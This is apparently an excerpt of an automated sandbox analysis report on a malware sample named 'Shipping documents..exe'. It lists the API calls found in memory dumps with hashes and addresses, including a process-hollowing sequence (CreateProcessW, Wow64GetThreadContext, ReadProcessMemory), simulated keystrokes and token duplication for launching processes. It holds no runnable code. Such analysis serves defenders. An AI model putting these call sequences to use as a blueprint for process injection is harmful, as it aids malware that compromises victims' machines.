• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
• String ID:
• API String ID: 3199840319-0
APIs
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
• __lock_file.LIBCMT ref: 00414A8D
  • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
• __fclose_nolock.LIBCMT ref: 00414A98
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 2800547568-0
APIs
• __lock_file.LIBCMT ref: 00415012
• __ftell_nolock.LIBCMT ref: 0041501F
  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: __ftell_nolock__getptd_noexit__lock_file
• String ID:
• API String ID: 2999321469-0
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 03EB46A3
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03EB4739
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03EB475B
Memory Dump Source
• Source File: 00000000.00000002.2124146446.0000000003EB2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EB2000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3eb2000_Shipping documents.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
                                                                                                          • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                          • Instruction ID: 91a40e4d533a72f6cd495741f20d78b3c302fe54aeb2d676bd1863ec258f84d1
                                                                                                          • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                          • Instruction Fuzzy Hash: 2512EF24E14658C6EB24DF60D8507DEB232EF68300F10A1E9910DEB7A5E77A4F81CF5A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 4104443479-0
                                                                                                          • Opcode ID: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
                                                                                                          • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                                                          • Opcode Fuzzy Hash: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
                                                                                                          • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                          • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                          • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                                                                          • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                                                          • Opcode Fuzzy Hash: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                                                                          • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                                                                          • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                                                                          • Opcode Fuzzy Hash: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                                                                          • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 3031932315-0
                                                                                                          • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                          • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                                                          • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                          • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                                                          APIs
                                                                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3934441357-0
                                                                                                          • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                          • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                                                                          • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                          • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wfsopen
                                                                                                          • String ID:
                                                                                                          • API String ID: 197181222-0
                                                                                                          • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                          • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                                                          • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                          • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                                                          APIs
                                                                                                          • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 2962429428-0
• Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
• Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
• Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
• Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
APIs
• Sleep.KERNELBASE(000001F4), ref: 03EB4EF9
Memory Dump Source
• Source File: 00000000.00000002.2124146446.0000000003EB2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EB2000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3eb2000_Shipping documents.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
• Instruction ID: 29937e24dc63c829cc47804863c36b4b2156785cc6d85381f7da5050639b2ca7
• Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
• Instruction Fuzzy Hash: 47E0BF7494410DEFDB00DFA8D5496EE7BB4EF04301F1006A1FD05E7681DB309E548A62
APIs
• Sleep.KERNELBASE(000001F4), ref: 03EB4EF9
Memory Dump Source
• Source File: 00000000.00000002.2124146446.0000000003EB2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EB2000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3eb2000_Shipping documents.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction ID: f094241c748ab4de49506194e487d178b7984b54e8e604dd1d29630fbba778fa
• Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction Fuzzy Hash: 21E0E67494410DDFDB00DFB8D5496EE7BB4EF04301F1002A1FD01E2281D6309D508A72
APIs
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
• DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
• GetKeyState.USER32(00000011), ref: 0047C92D
• GetKeyState.USER32(00000009), ref: 0047C936
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
• GetKeyState.USER32(00000010), ref: 0047C953
• GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
• SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
• SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
• _wcsncpy.LIBCMT ref: 0047CA29
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
• SendMessageW.USER32 ref: 0047CA7F
• InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
• SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
• ImageList_SetDragCursorImage.COMCTL32(00C00CA8,00000000,00000000,00000000), ref: 0047CB9B
• ImageList_BeginDrag.COMCTL32(00C00CA8,00000000,000000F8,000000F0), ref: 0047CBAC
• SetCapture.USER32(?), ref: 0047CBB6
• ClientToScreen.USER32(?,?), ref: 0047CC17
• ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
• ReleaseCapture.USER32 ref: 0047CC3A
• GetCursorPos.USER32(?), ref: 0047CC72
• ScreenToClient.USER32(?,?), ref: 0047CC80
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
• SendMessageW.USER32 ref: 0047CD12
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
• SendMessageW.USER32 ref: 0047CD80
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
• GetCursorPos.USER32(?), ref: 0047CDC8
• ScreenToClient.USER32(?,?), ref: 0047CDD6
• GetParent.USER32(00000000), ref: 0047CDF7
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
• SendMessageW.USER32 ref: 0047CE93
• ClientToScreen.USER32(?,?), ref: 0047CEEE
• TrackPopupMenuEx.USER32(?,00000000,?,?,01931B40,00000000,?,?,?,?), ref: 0047CF1C
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
• SendMessageW.USER32 ref: 0047CF6B
• ClientToScreen.USER32(?,?), ref: 0047CFB5
• TrackPopupMenuEx.USER32(?,00000080,?,?,01931B40,00000000,?,?,?,?), ref: 0047CFE6
• GetWindowLongW.USER32(?,000000F0), ref: 0047D086
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
• String ID: @GUI_DRAGID$F
• API String ID: 3100379633-4164748364
• Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
• Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
• Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
• Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
APIs
• GetForegroundWindow.USER32 ref: 00434420
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
• IsIconic.USER32(?), ref: 0043444F
• ShowWindow.USER32(?,00000009), ref: 0043445C
• SetForegroundWindow.USER32(?), ref: 0043446A
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
• GetCurrentThreadId.KERNEL32 ref: 00434485
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
• AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
• SetForegroundWindow.USER32(00000000), ref: 004344B7
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
• keybd_event.USER32(00000012,00000000), ref: 004344CF
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
• keybd_event.USER32(00000012,00000000), ref: 004344E6
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
• keybd_event.USER32(00000012,00000000), ref: 004344FD
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
• keybd_event.USER32(00000012,00000000), ref: 00434514
• SetForegroundWindow.USER32(00000000), ref: 0043451E
• AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
• API String ID: 2889586943-2988720461
• Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
• Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
• Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
• Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
APIs
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
• CloseHandle.KERNEL32(?), ref: 004463A0
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
• GetProcessWindowStation.USER32 ref: 004463D1
• SetProcessWindowStation.USER32(00000000), ref: 004463DB
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
• _wcslen.LIBCMT ref: 00446498
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• _wcsncpy.LIBCMT ref: 004464C0
• LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
• CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
• CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
• UnloadUserProfile.USERENV(?,?), ref: 00446555
• CloseWindowStation.USER32(00000000), ref: 0044656C
• CloseDesktop.USER32(?), ref: 0044657A
• SetProcessWindowStation.USER32(?), ref: 00446588
• CloseHandle.KERNEL32(?), ref: 00446592
• DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
• String ID: $@OH$default$winsta0
• API String ID: 3324942560-3791954436
• Opcode ID: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
• Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
• Opcode Fuzzy Hash: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
• Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
APIs
  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Shipping documents..exe,0040F545,C:\Users\user\Desktop\Shipping documents..exe,004A90E8,C:\Users\user\Desktop\Shipping documents..exe,?,0040F545), ref: 0041013C
  • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
  • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
  • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
• _wcscat.LIBCMT ref: 0044BD94
• _wcscat.LIBCMT ref: 0044BDBD
• __wsplitpath.LIBCMT ref: 0044BDEA
• FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
• _wcscpy.LIBCMT ref: 0044BE71
• _wcscat.LIBCMT ref: 0044BE83
• _wcscat.LIBCMT ref: 0044BE95
• lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
• DeleteFileW.KERNEL32(?), ref: 0044BED3
• MoveFileW.KERNEL32(?,?), ref: 0044BEF3
• CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
• DeleteFileW.KERNEL32(?), ref: 0044BF15
• CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
• FindClose.KERNEL32(00000000), ref: 0044BF33
• MoveFileW.KERNEL32(?,?), ref: 0044BF4F
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
• FindClose.KERNEL32(00000000), ref: 0044BF7C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
• String ID: \*.*
                                                                                                          • API String ID: 2188072990-1173974218
                                                                                                          • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                          • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                                                          • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                          • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                                          • __swprintf.LIBCMT ref: 004789D3
                                                                                                          • __swprintf.LIBCMT ref: 00478A1D
                                                                                                          • __swprintf.LIBCMT ref: 00478A4B
                                                                                                          • __swprintf.LIBCMT ref: 00478A79
                                                                                                            • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                                                            • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                                                          • __swprintf.LIBCMT ref: 00478AA7
                                                                                                          • __swprintf.LIBCMT ref: 00478AD5
                                                                                                          • __swprintf.LIBCMT ref: 00478B03
                                                                                                          Strings
                                                                                                          Memory Dump Source
